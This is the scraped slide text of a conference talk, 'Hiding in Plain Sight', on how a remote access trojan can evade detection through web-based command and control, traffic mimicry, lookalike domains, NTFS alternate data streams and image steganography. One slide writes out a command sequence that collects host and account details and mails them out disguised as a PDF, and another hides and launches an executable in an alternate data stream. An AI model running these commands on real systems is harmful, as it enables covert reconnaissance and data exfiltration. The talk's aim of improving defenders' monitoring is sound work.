Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
HidinginPlainSight
Presentedby /RobGillen @argodev
Thisworkislicensedundera .
Thistalkandrelatedresourcesareavailableonlin...
Disclaimer
Thecontentofthispresentationrepresentsmypersonalviews
andthoughtsatthepresenttime.Ireservetherighttochange
myvi...
HTDCS
HelpdeskTicketDrivenCyberSecurity
Overview
RATDesign
Encryption
Command/Control(C2)
AntiVirus
Behavior
RATDesign
Exeisdroppedviainfectedpage
Querieswebpageforcommands
Performscommandsifnotdonepreviously
Periodicallypollsforne...
Encryption
ComplexEncryptionistrivial
PBKDF–Scryptsequentialmemory-hardfunction
Manyiterations(>10K)
Longkey-lengths
EncryptionExample
Aboveconfigurationiscustom-hardwareresistant
Takesapproximately¼secondperguess
Command/Control
UseWeb2CApproach
Commandsare“issued”enmassevianormal,benignlooking
webpages
Commonports
LeveragesexistingH...
CommandText
ipconfig /all > %APPDATA%info.txt
net start >> %APPDATA%info.txt
tasklist /v >> %APPDATA%info.txt
net user >> ...
MimicUserBehavior
TrafficRates
Monitorincoming/outgoingnetworktrafficforXdays
ConfigurexfiltostaywithinX%of“normal”
C2
Exp...
MimicUserBehavior
TargetURLs
Monitoroutgoingwebqueries/URLsforXdays
Usesimilardomainnamesformalicioustraffic
Appendsimilar...
HidinginLogs
v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-...
OtherHidingTechniques
OfficeFilecontentembedding
Creativelocation
AlternateDataStreams
LeastSignificantBit
NetworkProtocol...
CreativeFileLocations
AlternateDataStreams
FeatureofNTFSsinceNT3.5.1
Usedformetadataandcompatibilitywithotherfilesystems
SoWhat?
#notepad pcast-nitrd-report-2010.pdf:secret.txt
Whataboutthis?
#type evil.exe > notepad.exe:evil.exe
#start notepad.exe:evil.exe
CrudeImageStego:LSB
LeastSignificantBit–alteritandencodemessageacross
LSBthroughvariousbytes
Visuallyimperceptible
Computa...
LSB:HowItWorks
CarrierImage
ImageData:
Size:2.1MB
Dimensions:
3500x2343px
Resolution:300dpi
BitDepth:24
~8Megapixel
“Secret”Message:
Welc...
LSBBlowUp
NetworkProtocolAbuse
Challengesof
Signature-BasedTools
NextSteps
Knowwhatyoucanandcan’tsee
Considerimplicationsofyourmonitoringstrategy
Behavior*must*playarole
Questions/Contact
RobGillen
rob@gillenfamily.net
http://rob.gillenfamily.net
@argodev
Thistalkandrelatedresourcesareavaila...
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain Sight
Upcoming SlideShare
Loading in …5
×

CodeStock14: Hiding in Plain Sight

4,697 views

Published on

Presentation from

Published in: Technology, Design
  • Be the first to comment

  • Be the first to like this

CodeStock14: Hiding in Plain Sight

  1. 1. HidinginPlainSight Presentedby /RobGillen @argodev Thisworkislicensedundera . Thistalkandrelatedresourcesareavailableonline: CreativeCommonsAttribution4.0InternationalLicense https://github.com/argodev/talks/
  2. 2. Disclaimer Thecontentofthispresentationrepresentsmypersonalviews andthoughtsatthepresenttime.Ireservetherighttochange myviewsandopinionsatanytime.Thiscontentisnotendorsed by,orrepresentativeinanywayofmyemployernorisit intendedtobeaviewintomyworkorareflectiononthetype ofworkthatIormygroupperforms.Itissimplyahobbyand personalinterestandshouldbeconsideredassuch.
  3. 3. HTDCS HelpdeskTicketDrivenCyberSecurity
  4. 4. Overview RATDesign Encryption Command/Control(C2) AntiVirus Behavior
  5. 5. RATDesign Exeisdroppedviainfectedpage Querieswebpageforcommands Performscommandsifnotdonepreviously Periodicallypollsfornewcommands
  6. 6. Encryption ComplexEncryptionistrivial PBKDF–Scryptsequentialmemory-hardfunction Manyiterations(>10K) Longkey-lengths
  7. 7. EncryptionExample Aboveconfigurationiscustom-hardwareresistant Takesapproximately¼secondperguess
  8. 8. Command/Control UseWeb2CApproach Commandsare“issued”enmassevianormal,benignlooking webpages Commonports LeveragesexistingHTML/serverconstructs
  9. 9. CommandText ipconfig /all > %APPDATA%info.txt net start >> %APPDATA%info.txt tasklist /v >> %APPDATA%info.txt net user >> %APPDATA%info.txt net localgroup administrators >> %APPDATA%info.txt netstat -ano >> %APPDATA%info.txt net use >> %APPDATA%info.txt copy %APPDATA%info.txt %APPDATA%output.pdf del %APPDATA%info.txt sendmail %APPDATA%output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe-836@yopmail.com smtp.yourorg.gov del %APPDATA%output.pdf
  10. 10. MimicUserBehavior TrafficRates Monitorincoming/outgoingnetworktrafficforXdays ConfigurexfiltostaywithinX%of“normal” C2 Exponential/randomizedstand-down Onlycommduringperiodsofactivity
  11. 11. MimicUserBehavior TargetURLs Monitoroutgoingwebqueries/URLsforXdays Usesimilardomainnamesformalicioustraffic Appendsimilar/samequerystringstomaliciousrequests
  12. 12. HidinginLogs v-client-5b.sjc.dropbox.com snt-re3-9a.sjc.dropbox.com yn-in-f125.1e100.net l1.ycs.vip.dcb.yahoo.com snt-re3-9a.sjc.drpbox.com ip-69-31-29-228.nlayer.net a23-47-20-211.deploy.static.akamaitechnologies.com l3.ycs.vip.dcb.yahoo.com ir2.fp.vip.bf1.yahoo.com www.nbcnews.com.edgesuite.net wac.946A.edgecastcdn.net a2.twimg.com
  13. 13. OtherHidingTechniques OfficeFilecontentembedding Creativelocation AlternateDataStreams LeastSignificantBit NetworkProtocolManipulation
  14. 14. CreativeFileLocations
  15. 15. AlternateDataStreams FeatureofNTFSsinceNT3.5.1 Usedformetadataandcompatibilitywithotherfilesystems
  16. 16. SoWhat? #notepad pcast-nitrd-report-2010.pdf:secret.txt
  17. 17. Whataboutthis? #type evil.exe > notepad.exe:evil.exe #start notepad.exe:evil.exe
  18. 18. CrudeImageStego:LSB LeastSignificantBit–alteritandencodemessageacross LSBthroughvariousbytes Visuallyimperceptible Computationallychallengingtodetect Encryptionalsoanoption
  19. 19. LSB:HowItWorks
  20. 20. CarrierImage ImageData: Size:2.1MB Dimensions: 3500x2343px Resolution:300dpi BitDepth:24 ~8Megapixel “Secret”Message: Welcome!Remember, thingsaren’talways whattheyseem.
  21. 21. LSBBlowUp
  22. 22. NetworkProtocolAbuse
  23. 23. Challengesof Signature-BasedTools
  24. 24. NextSteps Knowwhatyoucanandcan’tsee Considerimplicationsofyourmonitoringstrategy Behavior*must*playarole
  25. 25. Questions/Contact RobGillen rob@gillenfamily.net http://rob.gillenfamily.net @argodev Thistalkandrelatedresourcesareavailableonline: https://github.com/argodev/talks/

×